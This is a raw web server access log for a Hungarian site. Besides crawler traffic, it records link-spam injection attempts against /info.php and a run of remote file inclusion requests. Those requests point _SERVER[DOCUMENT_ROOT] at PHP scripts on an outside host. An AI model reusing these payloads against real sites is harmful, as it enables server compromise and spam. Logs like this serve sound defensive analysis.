78.8.48.223 - - [02/May/2013:20:01:36 +0200] "GET /info.php?a[]=%3Ca+href=http://abiturient.pro/wiki/%D0%A3%D1%87%D0%B0%D1%81%D1%82%D0%BD%D0%B8%D0%BA:RobbieCol%3Eerotyka%3C/a%3E HTTP/1.1" 200 51443 "http://activparty.hu/" "Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.15"
157.56.229.189 - - [02/May/2013:20:57:33 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.56.229.189 - - [02/May/2013:20:59:03 +0200] "GET / HTTP/1.1" 200 3021 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
213.239.200.116 - - [02/May/2013:21:01:26 +0200] "GET /robots.txt HTTP/1.0" 404 - "-" "-"
213.239.200.116 - - [02/May/2013:21:01:26 +0200] "GET / HTTP/1.0" 200 3021 "-" "YandeG 1.02"
78.8.48.223 - - [02/May/2013:21:17:21 +0200] "GET /info.php?a[]=%3Ca+href=http://jawamdam.com.pl/%3Ehosp1cja%3C/a%3E HTTP/1.1" 200 51019 "http://activparty.hu/" "Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.15"
176.61.142.154 - - [02/May/2013:22:46:23 +0200] "GET /info.php?a[]=%3Ca+href=http://mail.andreagalup.com.ar/?a[]=%3Ca+href=http://thirdpartyinsurances.com/%3Elook+what+I+found%3C/a%3E%3Eadvice%3C/a%3E HTTP/1.0" 200 51564 "http://activparty.hu/" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1"
176.61.142.154 - - [02/May/2013:22:46:25 +0200] "GET /info.php?a[]=%3Ca+href=%url%%3E%anchor_text%%3C/a%3E HTTP/1.0" 200 50748 "http://activparty.hu/" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1"
157.56.229.189 - - [02/May/2013:22:51:22 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.56.229.189 - - [02/May/2013:22:54:02 +0200] "GET / HTTP/1.1" 200 3021 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.36.49 - - [02/May/2013:22:56:01 +0200] "GET /images/belepes_off.gif HTTP/1.1" 200 772 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.36.49 - - [02/May/2013:22:56:01 +0200] "GET /images/letoltes_on.gif HTTP/1.1" 200 821 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.55.24.245 - - [02/May/2013:22:56:01 +0200] "GET /images/logo.gif HTTP/1.1" 200 2246 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
176.61.142.106 - - [02/May/2013:23:01:20 +0200] "GET /info.php?a[]=%3Ca+href=http://3gunnation.com/member/212700/%3Ehttp://3gunnation.com%3C/a%3E HTTP/1.0" 200 50973 "http://activparty.hu/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0"
176.61.142.106 - - [02/May/2013:23:01:22 +0200] "GET /info.php?a[]=%3Ca+href=%url%%3E%anchor_text%%3C/a%3E HTTP/1.0" 200 50661 "http://activparty.hu/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0"
66.249.76.82 - - [02/May/2013:23:41:48 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.82 - - [02/May/2013:23:41:49 +0200] "GET /info.php?a%5B%5D=%3Ca+href=http://mail.andreagalup.com.ar/?a%5B%5D=%3Ca+href=http://thirdpartyinsurances.com/%3Elook+what+I+found%3C/a%3E%3Eadvice%3C/a%3E HTTP/1.1" 200 51195 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.82 - - [02/May/2013:23:49:49 +0200] "GET /info.php?a%5B%5D=%3Ca+href=http://gogreencoffee.blogspot.com/%3Egreen+coffee+beans%3C/a%3E HTTP/1.1" 200 50655 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.193.229.17 - - [02/May/2013:23:55:12 +0200] "GET /info.php&sa=U&ei=gdaCUd21EdTX4QTXv4DoAw&ved=0CCoQFjAGOGQ&usg=AFQjCNFQzgj_otEbkjRKTo6DZt3zZi-Czw//?_SERVER[DOCUMENT_ROOT]=test?? HTTP/1.0" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
212.193.229.17 - - [02/May/2013:23:55:13 +0200] "GET /info.php&sa=U&ei=gdaCUd21EdTX4QTXv4DoAw&ved=0CCoQFjAGOGQ&usg=AFQjCNFQzgj_otEbkjRKTo6DZt3zZi-Czw//?_SERVER[DOCUMENT_ROOT]=http://harrisbromly.com.au/ccs_ware/fire/sda/fr/flow.php?? HTTP/1.0" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
212.193.229.17 - - [02/May/2013:23:55:14 +0200] "GET /info.php&sa=U&ei=gdaCUd21EdTX4QTXv4DoAw&ved=0CCoQFjAGOGQ&usg=AFQjCNFQzgj_otEbkjRKTo6DZt3zZi-Czw//?_SERVER[DOCUMENT_ROOT]=http://harrisbromly.com.au/ccs_ware/fire/sda/fr/kun.php?? HTTP/1.0" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
212.193.229.17 - - [02/May/2013:23:55:15 +0200] "GET /info.php&sa=U&ei=gdaCUd21EdTX4QTXv4DoAw&ved=0CCoQFjAGOGQ&usg=AFQjCNFQzgj_otEbkjRKTo6DZt3zZi-Czw//?_SERVER[DOCUMENT_ROOT]=http://harrisbromly.com.au/ccs_ware/fire/sda/fr/kan.php?? HTTP/1.0" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
212.193.229.17 - - [02/May/2013:23:55:17 +0200] "GET /info.php&sa=U&ei=gdaCUd21EdTX4QTXv4DoAw&ved=0CCoQFjAGOGQ&usg=AFQjCNFQzgj_otEbkjRKTo6DZt3zZi-Czw//?_SERVER[DOCUMENT_ROOT]=http://harrisbromly.com.au/ccs_ware/fire/sda/fr/kenx.php?? HTTP/1.0" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
199.30.25.108 - - [02/May/2013:23:55:17 +0200] "GET /images/letoltes_off.gif HTTP/1.1" 200 821 "http://activparty.hu/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
199.30.25.108 - - [02/May/2013:23:55:18 +0200] "GET /images/belepes_on.gif HTTP/1.1" 200 771 "http://activparty.hu/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
212.193.229.17 - - [02/May/2013:23:55:18 +0200] "GET /info.php&sa=U&ei=gdaCUd21EdTX4QTXv4DoAw&ved=0CCoQFjAGOGQ&usg=AFQjCNFQzgj_otEbkjRKTo6DZt3zZi-Czw//?_SERVER[DOCUMENT_ROOT]=http://harrisbromly.com.au/ccs_ware/fire/sda/fr/do.ini?? HTTP/1.0" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
212.193.229.17 - - [02/May/2013:23:55:19 +0200] "GET //?_SERVER[DOCUMENT_ROOT]=test?? HTTP/1.0" 200 3021 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
212.193.229.17 - - [02/May/2013:23:55:20 +0200] "GET //?_SERVER[DOCUMENT_ROOT]=http://harrisbromly.com.au/ccs_ware/fire/sda/fr/flow.php?? HTTP/1.0" 200 3021 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
212.193.229.17 - - [02/May/2013:23:55:21 +0200] "GET //?_SERVER[DOCUMENT_ROOT]=http://harrisbromly.com.au/ccs_ware/fire/sda/fr/kun.php?? HTTP/1.0" 200 3021 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
212.193.229.17 - - [02/May/2013:23:55:23 +0200] "GET //?_SERVER[DOCUMENT_ROOT]=http://harrisbromly.com.au/ccs_ware/fire/sda/fr/kan.php?? HTTP/1.0" 200 3021 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
212.193.229.17 - - [02/May/2013:23:55:24 +0200] "GET //?_SERVER[DOCUMENT_ROOT]=http://harrisbromly.com.au/ccs_ware/fire/sda/fr/kenx.php?? HTTP/1.0" 200 3021 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
212.193.229.17 - - [02/May/2013:23:55:25 +0200] "GET //?_SERVER[DOCUMENT_ROOT]=http://harrisbromly.com.au/ccs_ware/fire/sda/fr/do.ini?? HTTP/1.0" 200 3021 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
209.191.189.242 - - [02/May/2013:23:59:43 +0200] "GET /info.php?a[]=%3Ca+href=http://gogreencoffee.blogspot.com/%3Egreen+coffee+beans%3C/a%3E HTTP/1.1" 200 50814 "-" "UniversalFeedParser/4.2-pre-295-svn +http://feedparser.org/"
209.191.189.242 - - [02/May/2013:23:59:49 +0200] "GET /atom.xml HTTP/1.1" 404 - "-" "UniversalFeedParser/4.2-pre-295-svn +http://feedparser.org/"
209.191.189.242 - - [02/May/2013:23:59:51 +0200] "GET /index.atom HTTP/1.1" 404 - "-" "UniversalFeedParser/4.2-pre-295-svn +http://feedparser.org/"
209.191.189.242 - - [02/May/2013:23:59:51 +0200] "GET /index.rdf HTTP/1.1" 404 - "-" "UniversalFeedParser/4.2-pre-295-svn +http://feedparser.org/"
209.191.189.242 - - [02/May/2013:23:59:52 +0200] "GET /rss.xml HTTP/1.1" 404 - "-" "UniversalFeedParser/4.2-pre-295-svn +http://feedparser.org/"
209.191.189.242 - - [02/May/2013:23:59:52 +0200] "GET /index.xml HTTP/1.1" 404 - "-" "UniversalFeedParser/4.2-pre-295-svn +http://feedparser.org/"
209.191.189.242 - - [02/May/2013:23:59:58 +0200] "GET /index.rss HTTP/1.1" 404 - "-" "UniversalFeedParser/4.2-pre-295-svn +http://feedparser.org/"
194.72.238.241 - - [03/May/2013:00:25:35 +0200] "HEAD / HTTP/1.0" 200 0 "http://www.netcraft.com/survey/" "Mozilla/4.0 (compatible; Netcraft Web Server Survey)"
157.56.229.189 - - [03/May/2013:01:06:42 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
209.249.53.233 - - [03/May/2013:01:08:05 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)"
209.249.53.88 - - [03/May/2013:01:08:06 +0200] "GET /info.php?a[]=greencoffeebeans HTTP/1.1" 200 51936 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1 + FairShare-http://fairshare.cc)"
157.56.229.189 - - [03/May/2013:01:08:31 +0200] "GET / HTTP/1.1" 200 3021 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
66.249.76.177 - - [03/May/2013:01:26:18 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.177 - - [03/May/2013:01:26:18 +0200] "GET / HTTP/1.1" 200 3021 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
173.213.97.46 - - [03/May/2013:02:06:10 +0200] "GET /info.php?a[]=%3Ca+href=http://mail.andreagalup.com.ar/?a[]=%3Ca+href=http://thirdpartyinsurances.com/%3Elook+what+I+found%3C/a%3E%3Eadvice%3C/a%3E HTTP/1.0" 200 51683 "http://activparty.hu/" "Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
173.213.97.46 - - [03/May/2013:02:06:12 +0200] "GET /info.php?a[]=%3Ca+href=%url%%3E%anchor_text%%3C/a%3E HTTP/1.0" 200 50867 "http://activparty.hu/" "Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
94.242.255.138 - - [03/May/2013:02:08:03 +0200] "GET /info.php?a[]=%3Ca+href=%url%%3E%anchor_text%%3C/a%3E HTTP/1.1" 200 50919 "http://activparty.hu/" "Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1"
23.29.125.175 - - [03/May/2013:02:19:59 +0200] "GET /info.php?a[]=%3Ca+href=http://mail.andreagalup.com.ar/?a[]=%3Ca+href=http://thirdpartyinsurances.com/%3Elook+what+I+found%3C/a%3E%3Eadvice%3C/a%3E HTTP/1.0" 200 51536 "http://activparty.hu/" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]"
23.29.125.175 - - [03/May/2013:02:20:01 +0200] "GET /info.php?a[]=%3Ca+href=%url%%3E%anchor_text%%3C/a%3E HTTP/1.0" 200 50720 "http://activparty.hu/" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]"
66.249.76.82 - - [03/May/2013:03:33:10 +0200] "GET / HTTP/1.1" 200 3021 "-" "DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
157.56.229.189 - - [03/May/2013:06:19:54 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.56.229.189 - - [03/May/2013:06:21:40 +0200] "GET / HTTP/1.1" 200 3021 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
41.189.32.124 - - [03/May/2013:07:31:52 +0200] "GET / HTTP/1.1" 200 3021 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt; DTS Agent"
66.249.76.177 - - [03/May/2013:08:01:01 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
94.242.255.138 - - [03/May/2013:09:10:40 +0200] "GET /info.php?a[]=%3Ca+href=http://www.2circolodidatticocaltagirone.it/modules.php?name=Your_Account&op=userinfo&username=Larry00N%3E2Circolodidatticocaltagirone.it%3C/a%3E HTTP/1.1" 200 52174 "http://activparty.hu/" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]"
94.242.255.138 - - [03/May/2013:10:20:50 +0200] "GET /info.php?a[]=%3Ca+href=http://lochcarrongarage.com/index.php?option=com_blog&view=comments&pid=37247&Itemid=0%3Elochcarrongarage.com%3C/a%3E HTTP/1.1" 200 52037 "http://activparty.hu/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0"
74.117.177.166 - - [03/May/2013:11:20:07 +0200] "GET / HTTP/1.1" 200 3021 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.307.7 Safari/532.9"
74.117.177.166 - - [03/May/2013:11:20:13 +0200] "GET / HTTP/1.1" 200 3021 "-" "Mozilla/5.0 (X11; U; Linux x86_64; C) AppleWebKit/533.3 (KHTML, like Gecko) Qt/4.7.4 Safari/533.3"
74.117.177.166 - - [03/May/2013:11:20:13 +0200] "GET /images/belepes_off.gif HTTP/1.1" 200 772 "http://activparty.hu/" "Mozilla/5.0 (X11; U; Linux x86_64; C) AppleWebKit/533.3 (KHTML, like Gecko) Qt/4.7.4 Safari/533.3"
74.117.177.166 - - [03/May/2013:11:20:13 +0200] "GET /images/logo.gif HTTP/1.1" 200 2246 "http://activparty.hu/" "Mozilla/5.0 (X11; U; Linux x86_64; C) AppleWebKit/533.3 (KHTML, like Gecko) Qt/4.7.4 Safari/533.3"
74.117.177.166 - - [03/May/2013:11:20:13 +0200] "GET /images/letoltes_off.gif HTTP/1.1" 200 821 "http://activparty.hu/" "Mozilla/5.0 (X11; U; Linux x86_64; C) AppleWebKit/533.3 (KHTML, like Gecko) Qt/4.7.4 Safari/533.3"
74.117.177.166 - - [03/May/2013:11:20:13 +0200] "GET /images/belepes_on.gif HTTP/1.1" 200 771 "http://activparty.hu/" "Mozilla/5.0 (X11; U; Linux x86_64; C) AppleWebKit/533.3 (KHTML, like Gecko) Qt/4.7.4 Safari/533.3"
74.117.177.166 - - [03/May/2013:11:20:13 +0200] "GET /images/letoltes_on.gif HTTP/1.1" 200 821 "http://activparty.hu/" "Mozilla/5.0 (X11; U; Linux x86_64; C) AppleWebKit/533.3 (KHTML, like Gecko) Qt/4.7.4 Safari/533.3"
94.242.255.138 - - [03/May/2013:12:15:55 +0200] "GET /info.php?a[]=%3Ca+href=http://moodle.trainingprospects.com.au/user/view.php?id=108594&course=1%3Emoodle.trainingprospects.com.au%3C/a%3E HTTP/1.1" 200 51730 "http://activparty.hu/" "Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.15"
94.242.255.138 - - [03/May/2013:12:33:49 +0200] "GET /info.php?a[]=%3Ca+href=http://www.m2bob-forum.eu//index.php//index.php/index.php?page=User&userID=66366%3Ewww.m2bob-forum.eu%3C/a%3E HTTP/1.1" 200 51846 "http://activparty.hu/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 5.8 (build 4157); .NET CLR 2.0.50727; AskTbPTV/5.11.3.15590)"
94.242.255.138 - - [03/May/2013:14:26:54 +0200] "GET /info.php?a[]=%3Ca+href=http://midlake.net/forum/profile.php?mode=viewprofile&u=207689%3Emidlake.Net%3C/a%3E HTTP/1.1" 200 51672 "http://activparty.hu/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
142.0.34.174 - - [03/May/2013:16:27:26 +0200] "GET /info.php?a[]=%3Ca+href=http://mail.andreagalup.com.ar/?a[]=%3Ca+href=http://thirdpartyinsurances.com/%3Elook+what+I+found%3C/a%3E%3Eadvice%3C/a%3E HTTP/1.0" 200 51471 "HTTP://activparty.hu/" "Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.15"
142.0.34.174 - - [03/May/2013:16:27:28 +0200] "GET /info.php?a[]=%3Ca+href=http://mail.andreagalup.com.ar/?a[]=%3Ca+href=http://thirdpartyinsurances.com/%3Elook+what+I+found%3C/a%3E%3Eadvice%3C/a%3E HTTP/1.0" 200 51687 "HTTP://activparty.hu/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 3.5.30729)"
94.242.255.138 - - [03/May/2013:16:27:31 +0200] "GET /info.php?a[]=%3Ca+href=http://mail.andreagalup.com.ar/?a[]=%3Ca+href=http://thirdpartyinsurances.com/%3Elook+what+I+found%3C/a%3E%3Eadvice%3C/a%3E HTTP/1.0" 200 51706 "https://hermes-net.de/scuttle/bookmarks.php/joeyoverstree?action=add" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1"
94.242.255.138 - - [03/May/2013:16:42:38 +0200] "GET /info.php?a[]=%3Ca+href=http://courses.migrantclinician.org/user/view.php?id=84863&course=1%3Ehttp://courses.migrantclinician.org/user/view.php?id=84863&course=1%3C/a%3E HTTP/1.1" 200 51886 "http://activparty.hu/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
137.145.56.55 - - [03/May/2013:17:03:52 +0200] "GET / HTTP/1.1" 200 3021 "-" "Java/1.7.0_05"
137.145.56.55 - - [03/May/2013:17:03:53 +0200] "GET /aktivparty.html HTTP/1.1" 200 1528 "-" "Java/1.7.0_05"
137.145.56.55 - - [03/May/2013:17:03:53 +0200] "GET /js/AC_RunActiveContent.js HTTP/1.1" 200 8321 "-" "Java/1.7.0_05"
46.20.44.186 - - [03/May/2013:17:20:06 +0200] "GET / HTTP/1.1" 200 3021 "-" "-"
77.88.42.27 - - [03/May/2013:18:49:15 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
77.88.42.27 - - [03/May/2013:18:49:17 +0200] "GET /images/belepes_off.gif HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)"
94.242.255.138 - - [03/May/2013:19:31:18 +0200] "GET /info.php?a[]=%3Ca+href=http://www.periquitos.com.br/forum/profile.php?mode=viewprofile&u=163483%3EFind+Out+More%3C/a%3E HTTP/1.1" 200 51629 "http://activparty.hu/" "Mozilla/5.0 (Windows NT 6.1; rv:2.0b7pre) Gecko/20100921 Firefox/4.0b7pre"
94.242.255.138 - - [03/May/2013:19:50:43 +0200] "GET /info.php?a[]=%3Ca+href=http://www.bekkaboo.com/phpBB2/profile.php?mode=viewprofile&u=76430%3E[7]%3C/a%3E HTTP/1.1" 200 51468 "http://activparty.hu/" "Mozilla/5.0 (Windows NT 5.1; rv:5.0.1) Gecko/20100101 Firefox/5.0.1"
66.249.78.49 - - [03/May/2013:20:24:37 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.49 - - [03/May/2013:20:24:37 +0200] "GET / HTTP/1.1" 200 3021 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
94.242.255.138 - - [03/May/2013:22:47:22 +0200] "GET /info.php?a[]=%3Ca+href=%url%%3E%anchor_text%%3C/a%3E HTTP/1.1" 200 51129 "http://activparty.hu/" "Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
94.242.255.138 - - [03/May/2013:23:06:09 +0200] "GET /info.php?a[]=%3Ca+href=%url%%3E%anchor_text%%3C/a%3E HTTP/1.1" 200 50916 "http://activparty.hu/" "Mozilla/5.0 (Windows NT 5.1; rv:5.0.1) Gecko/20100101 Firefox/5.0.1"
123.125.71.44 - - [03/May/2013:23:13:53 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2"
94.242.255.138 - - [04/May/2013:01:05:06 +0200] "GET /info.php?a[]=%3Ca+href=http://mail.andreagalup.com.ar/?a[]=%3Ca+href=http://thirdpartyinsurances.com/%3Elook+what+I+found%3C/a%3E%3Eadvice%3C/a%3E HTTP/1.1" 200 51780 "http://activparty.hu/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
94.242.255.138 - - [04/May/2013:01:10:35 +0200] "GET /info.php?a[]=%3Ca+href=http://mail.andreagalup.com.ar/?a[]=%3Ca+href=http://thirdpartyinsurances.com/%3Elook+what+I+found%3C/a%3E%3Eadvice%3C/a%3E HTTP/1.1" 200 51831 "http://activparty.hu/" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1"
94.242.255.138 - - [04/May/2013:01:19:48 +0200] "GET /info.php?a[]=%3Ca+href=http://gogreencoffee.blogspot.com/%3Egreen+coffee+beans%3C/a%3E HTTP/1.1" 200 51430 "http://activparty.hu/" "Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
94.242.255.138 - - [04/May/2013:01:23:29 +0200] "GET /info.php?a[]=%3Ca+href=http://mail.andreagalup.com.ar/?a[]=%3Ca+href=http://thirdpartyinsurances.com/%3Elook+what+I+found%3C/a%3E%3Eadvice%3C/a%3E HTTP/1.1" 200 51913 "http://activparty.hu/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
94.242.255.138 - - [04/May/2013:02:24:36 +0200] "GET /info.php?a[]=%3Ca+href=%url%%3E%anchor_text%%3C/a%3E HTTP/1.1" 200 51097 "http://activparty.hu/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
78.8.48.223 - - [04/May/2013:04:00:20 +0200] "GET /info.php HTTP/1.1" 200 50384 "http://activparty.hu/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0"
74.111.23.38 - - [04/May/2013:04:08:08 +0200] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
74.111.23.38 - - [04/May/2013:04:08:11 +0200] "GET / HTTP/1.1" 200 3021 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
74.111.23.38 - - [04/May/2013:04:08:13 +0200] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
74.111.23.38 - - [04/May/2013:04:08:15 +0200] "GET / HTTP/1.1" 200 3021 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
66.249.78.49 - - [04/May/2013:04:37:59 +0200] "GET / HTTP/1.1" 200 3021 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6531.22.7 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
66.249.76.82 - - [04/May/2013:05:32:55 +0200] "GET / HTTP/1.1" 200 3021 "-" "SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
66.249.78.49 - - [04/May/2013:06:09:55 +0200] "GET /aktivparty.html HTTP/1.1" 304 - "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6531.22.7 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
173.213.97.41 - - [04/May/2013:06:12:36 +0200] "GET /info.php?a[]=%3Ca+href=http://mail.andreagalup.com.ar/?a[]=%3Ca+href=http://thirdpartyinsurances.com/%3Elook+what+I+found%3C/a%3E%3Eadvice%3C/a%3E HTTP/1.0" 200 51534 "http://activparty.hu/" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]"
173.213.97.41 - - [04/May/2013:06:12:37 +0200] "GET /info.php?a[]=%3Ca+href=http://mail.andreagalup.com.ar/?a[]=%3Ca+href=http://thirdpartyinsurances.com/%3Elook+what+I+found%3C/a%3E%3Eadvice%3C/a%3E HTTP/1.0" 200 51492 "http://activparty.hu/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
77.111.90.197 - - [04/May/2013:08:52:24 +0200] "GET / HTTP/1.1" 200 3021 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008111318 Ubuntu/8.10 (intrepid) Firefox/3.0.4"
77.88.42.27 - - [04/May/2013:10:39:22 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
77.88.42.27 - - [04/May/2013:10:39:23 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
